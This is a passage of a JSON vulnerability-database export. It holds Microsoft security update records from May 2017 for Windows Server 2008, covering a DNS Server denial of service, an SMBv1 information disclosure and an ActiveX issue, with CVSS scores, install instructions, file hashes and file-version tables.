"AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2017-05-09T07:00:00", "id": "KB4019204", "href": "https://support.microsoft.com/en-us/help/4019204", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T13:19:35", "description": "None\n## Summary\n\nA denial of service vulnerability exists in Windows DNS Server if the server is configured to answer version queries. An attacker who successfully exploits this vulnerability could cause the DNS Server service to become unresponsive. \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018196>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018196-x64.msu| 9DE300553C1CD0DF9A0E3349DF3F1674D795E4FB| 95371DB51917AB23C180F37D82299845DF4754CFDF41A0F0FFD89B1E88A50069 \nWindows6.0-KB4018196-x86.msu| 6A937C9FA6CF63298282E7CC29BC8EB1EA226616| 3501B601B7FAA785844DD996CC5B4E6A2D10E5793F1AFAF01DA122189E297AEA \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCache.dns| Not applicable| 3,179| 03-Sep-2008| 18:33| Not applicable \nDns.exe| 6.0.6002.19765| 640,000| 07-Apr-2017| 14:53| x64 \nDnsserver.events.xml| Not applicable| 609| 03-Sep-2008| 18:33| Not applicable \nCache.dns| Not applicable| 3,179| 07-Mar-2016| 23:34| Not applicable \nDns.exe| 6.0.6002.24089| 640,512| 07-Apr-2017| 14:53| x64 \nDnsserver.events.xml| Not applicable| 609| 07-Mar-2016| 23:34| Not applicable \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCache.dns| Not applicable| 3,179| 16-Apr-2008| 00:31| Not applicable \nDns.exe| 6.0.6002.19765| 510,976| 07-Apr-2017| 14:27| x86 \nDnsserver.events.xml| Not applicable| 609| 16-Apr-2008| 00:31| Not applicable \nCache.dns| Not applicable| 3,179| 07-Mar-2016| 23:35| Not applicable \nDns.exe| 6.0.6002.24089| 511,488| 07-Apr-2017| 14:30| x86 \nDnsserver.events.xml| Not applicable| 609| 07-Mar-2016| 23:35| Not applicable\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows DNS Server Denial of Service Vulnerability in Microsoft Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0171"], "modified": "2017-05-09T07:00:00", "id": "KB4018196", "href": "https://support.microsoft.com/en-us/help/4018196", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T13:20:38", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploits this vulnerability could craft a special packet. This could cause an information disclosure from the server. \n \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018466>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018466-ia64.msu| C3F75846826AD3992FBC2D7A8C57A85F7F0A397C| 38D980BA623A0AD5695DB70F6CA0B49A9A1069EE304DCF1FF4F4411823EBC0C7 \nWindows6.0-KB4018466-x64.msu| 716403222008343DAD1A9964E1C45787E51A8792| 5DF45753B06958D0DA1FE1E4DF6C74A504D0BA23E5FE005A09DBDA07D18CB448 \nWindows6.0-KB4018466-x86.msu| 33843FD20FDD7D88A77C6AC5BA02145641EDE966| FBC2257442A6ED0351FB677F93A8FB71A2C2BD64B73D23F63D7668D1440D760A \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nNetevent.dll.mui| 6.0.6002.19673| 270,336| 03-Aug-2016| 16:57| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 230,912| 03-Aug-2016| 15:36| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,848| 03-Aug-2016| 17:01| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 144,384| 03-Aug-2016| 16:49| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 137,216| 03-Aug-2016| 17:04| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 99,840| 03-Aug-2016| 17:00| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 101,376| 03-Aug-2016| 16:55| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,336| 07-Apr-2017| 16:51| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 230,912| 07-Apr-2017| 15:22| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,848| 07-Apr-2017| 16:42| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 144,384| 07-Apr-2017| 16:54| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 137,216| 07-Apr-2017| 16:49| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 99,840| 07-Apr-2017| 16:53| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 101,376| 07-Apr-2017| 16:45| Not applicable \nNetevent.dll| 6.0.6002.19673| 17,920| 03-Aug-2016| 15:35| IA-64 \nNetevent.dll| 6.0.6002.24089| 17,920| 07-Apr-2017| 15:17| IA-64 \nSrvnet.sys| 6.0.6002.19673| 297,984| 03-Aug-2016| 14:20| IA-64 \nSrvnet.sys| 6.0.6002.24089| 297,984| 07-Apr-2017| 14:21| IA-64 \nSrv.sys| 6.0.6002.19765| 967,168| 07-Apr-2017| 14:21| IA-64 \nSrv.sys| 6.0.6002.24089| 969,216| 07-Apr-2017| 14:22| IA-64 \nSrv2.sys| 6.0.6002.19765| 468,480| 07-Apr-2017| 14:21| IA-64 \nSrv2.sys| 6.0.6002.24089| 474,624| 07-Apr-2017| 14:21| IA-64 \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 03-Aug-2016| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 15:44| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 03-Aug-2016| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 155,648| 03-Aug-2016| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 147,456| 03-Aug-2016| 16:31| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 110,592| 03-Aug-2016| 16:39| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 110,592| 03-Aug-2016| 16:27| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 278,528| 07-Apr-2017| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 15:26| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 278,528| 07-Apr-2017| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 155,648| 07-Apr-2017| 16:34| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 147,456| 07-Apr-2017| 16:25| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 110,592| 07-Apr-2017| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 110,592| 07-Apr-2017| 16:33| Not applicable \nNetevent.dll| 6.0.6002.19673| 17,920| 03-Aug-2016| 15:45| x86 \nNetevent.dll| 6.0.6002.24089| 17,920| 07-Apr-2017| 15:24| x86 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nNetevent.dll.mui| 6.0.6002.19673| 233,984| 03-Aug-2016| 17:08| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 239,104| 03-Aug-2016| 17:08| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,336| 03-Aug-2016| 17:06| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 289,792| 03-Aug-2016| 17:03| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 230,912| 03-Aug-2016| 16:23| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 263,168| 03-Aug-2016| 17:04| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 229,376| 03-Aug-2016| 17:05| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,848| 03-Aug-2016| 17:08| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 253,440| 03-Aug-2016| 17:10| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 262,144| 03-Aug-2016| 17:11| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 144,384| 03-Aug-2016| 17:15| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 137,216| 03-Aug-2016| 17:07| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 229,376| 03-Aug-2016| 17:16| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 253,952| 03-Aug-2016| 17:09| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 248,320| 03-Aug-2016| 17:02| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 253,440| 03-Aug-2016| 17:09| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 261,120| 03-Aug-2016| 17:12| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,152| 03-Aug-2016| 17:11| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 231,936| 03-Aug-2016| 17:10| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 230,912| 03-Aug-2016| 17:12| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 99,840| 03-Aug-2016| 17:08| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 101,376| 03-Aug-2016| 17:12| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 233,984| 07-Apr-2017| 16:47| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 239,104| 07-Apr-2017| 16:47| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,336| 07-Apr-2017| 16:55| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 289,792| 07-Apr-2017| 16:56| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 230,912| 07-Apr-2017| 15:45| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 263,168| 07-Apr-2017| 16:58| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 229,376| 07-Apr-2017| 16:56| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,848| 07-Apr-2017| 16:47| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 253,440| 07-Apr-2017| 16:49| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 262,144| 07-Apr-2017| 17:02| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 144,384| 07-Apr-2017| 17:01| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 137,216| 07-Apr-2017| 16:53| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 229,376| 07-Apr-2017| 17:01| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 253,952| 07-Apr-2017| 17:01| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 248,320| 07-Apr-2017| 16:48| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 253,440| 07-Apr-2017| 16:56| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 261,120| 07-Apr-2017| 16:58| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,152| 07-Apr-2017| 16:55| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 231,936| 07-Apr-2017| 16:55| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 230,912| 07-Apr-2017| 16:57| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 99,840| 07-Apr-2017| 16:52| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 101,376| 07-Apr-2017| 16:53| Not applicable \nNetevent.dll| 6.0.6002.19673| 17,920| 03-Aug-2016| 16:23| x64 \nNetevent.dll| 6.0.6002.24089| 17,920| 07-Apr-2017| 15:43| x64 \nSrvnet.sys| 6.0.6002.19673| 147,456| 03-Aug-2016| 14:40| x64 \nSrvnet.sys| 6.0.6002.24089| 147,968| 07-Apr-2017| 14:42| x64 \nSrv.sys| 6.0.6002.19765| 446,464| 07-Apr-2017| 14:43| x64 \nSrv.sys| 6.0.6002.24089| 445,440| 07-Apr-2017| 14:42| x64 \nSrv2.sys| 6.0.6002.19765| 176,128| 07-Apr-2017| 14:42| x64 \nSrv2.sys| 6.0.6002.24089| 178,176| 07-Apr-2017| 14:42| x64 \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 16:22| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 249,856| 03-Aug-2016| 16:21| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 03-Aug-2016| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 299,008| 03-Aug-2016| 16:28| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 15:44| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 274,432| 03-Aug-2016| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 237,568| 03-Aug-2016| 16:29| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 03-Aug-2016| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 262,144| 03-Aug-2016| 16:33| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,336| 03-Aug-2016| 16:40| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 155,648| 03-Aug-2016| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 147,456| 03-Aug-2016| 16:31| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 237,568| 03-Aug-2016| 16:27| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 262,144| 03-Aug-2016| 16:39| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 258,048| 03-Aug-2016| 16:40| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 262,144| 03-Aug-2016| 16:40| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,336| 03-Aug-2016| 16:32| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 249,856| 03-Aug-2016| 16:33| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 110,592| 03-Aug-2016| 16:39| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 110,592| 03-Aug-2016| 16:27| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 249,856| 07-Apr-2017| 16:22| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 278,528| 07-Apr-2017| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 299,008| 07-Apr-2017| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 15:26| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 274,432| 07-Apr-2017| 16:36| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 237,568| 07-Apr-2017| 16:34| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 278,528| 07-Apr-2017| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 262,144| 07-Apr-2017| 16:29| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,336| 07-Apr-2017| 16:30| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 155,648| 07-Apr-2017| 16:34| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 147,456| 07-Apr-2017| 16:25| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 237,568| 07-Apr-2017| 16:21| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 262,144| 07-Apr-2017| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 258,048| 07-Apr-2017| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 262,144| 07-Apr-2017| 16:44| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,336| 07-Apr-2017| 16:42| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 249,856| 07-Apr-2017| 16:39| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 16:30| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 16:22| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 110,592| 07-Apr-2017| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 110,592| 07-Apr-2017| 16:33| Not applicable \nNetevent.dll| 6.0.6002.19673| 17,920| 03-Aug-2016| 15:45| x86 \nNetevent.dll| 6.0.6002.24089| 17,920| 07-Apr-2017| 15:24| x86 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 16:22| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 249,856| 03-Aug-2016| 16:21| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 03-Aug-2016| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 299,008| 03-Aug-2016| 16:28| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 15:44| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 274,432| 03-Aug-2016| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 237,568| 03-Aug-2016| 16:29| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 278,528| 03-Aug-2016| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 262,144| 03-Aug-2016| 16:33| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,336| 03-Aug-2016| 16:40| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 155,648| 03-Aug-2016| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 147,456| 03-Aug-2016| 16:31| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 237,568| 03-Aug-2016| 16:27| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 262,144| 03-Aug-2016| 16:39| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 258,048| 03-Aug-2016| 16:40| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 262,144| 03-Aug-2016| 16:40| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 270,336| 03-Aug-2016| 16:32| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 249,856| 03-Aug-2016| 16:33| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 241,664| 03-Aug-2016| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 110,592| 03-Aug-2016| 16:39| Not applicable \nNetevent.dll.mui| 6.0.6002.19673| 110,592| 03-Aug-2016| 16:27| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 249,856| 07-Apr-2017| 16:22| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 278,528| 07-Apr-2017| 16:20| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 299,008| 07-Apr-2017| 16:19| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 15:26| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 274,432| 07-Apr-2017| 16:36| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 237,568| 07-Apr-2017| 16:34| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 278,528| 07-Apr-2017| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 262,144| 07-Apr-2017| 16:29| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,336| 07-Apr-2017| 16:30| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 155,648| 07-Apr-2017| 16:34| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 147,456| 07-Apr-2017| 16:25| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 237,568| 07-Apr-2017| 16:21| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 262,144| 07-Apr-2017| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 258,048| 07-Apr-2017| 16:35| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 262,144| 07-Apr-2017| 16:44| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 270,336| 07-Apr-2017| 16:42| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 249,856| 07-Apr-2017| 16:39| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 16:30| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 241,664| 07-Apr-2017| 16:22| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 110,592| 07-Apr-2017| 16:38| Not applicable \nNetevent.dll.mui| 6.0.6002.24089| 110,592| 07-Apr-2017| 16:33| Not applicable \nNetevent.dll| 6.0.6002.19673| 17,920| 03-Aug-2016| 15:45| x86 \nNetevent.dll| 6.0.6002.24089| 17,920| 07-Apr-2017| 15:24| x86 \nSrvnet.sys| 6.0.6002.19673| 103,936| 03-Aug-2016| 14:20| x86 \nSrvnet.sys| 6.0.6002.24089| 103,936| 07-Apr-2017| 14:22| x86 \nSrv.sys| 6.0.6002.19765| 305,152| 07-Apr-2017| 14:19| x86 \nSrv.sys| 6.0.6002.24089| 305,152| 07-Apr-2017| 14:22| x86 \nSrv2.sys| 6.0.6002.19765| 146,432| 07-Apr-2017| 14:19| x86 \nSrv2.sys| 6.0.6002.24089| 148,480| 07-Apr-2017| 14:22| x86\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows SMB Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0269"], "modified": "2017-05-09T07:00:00", "id": "KB4018466", "href": "https://support.microsoft.com/en-us/help/4018466", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-12-31T14:39:42", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists in the way that some ActiveX objects are instantiated. An attacker who successfully exploits this vulnerability could gain access to protected memory contents. \n \nTo learn more about the vulnerability, go to [CVE-2017-0242](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0242>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018927>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018927-ia64.msu| 27D474F44AD7A45969BA4BBBBF53349EF0DD1AC7| 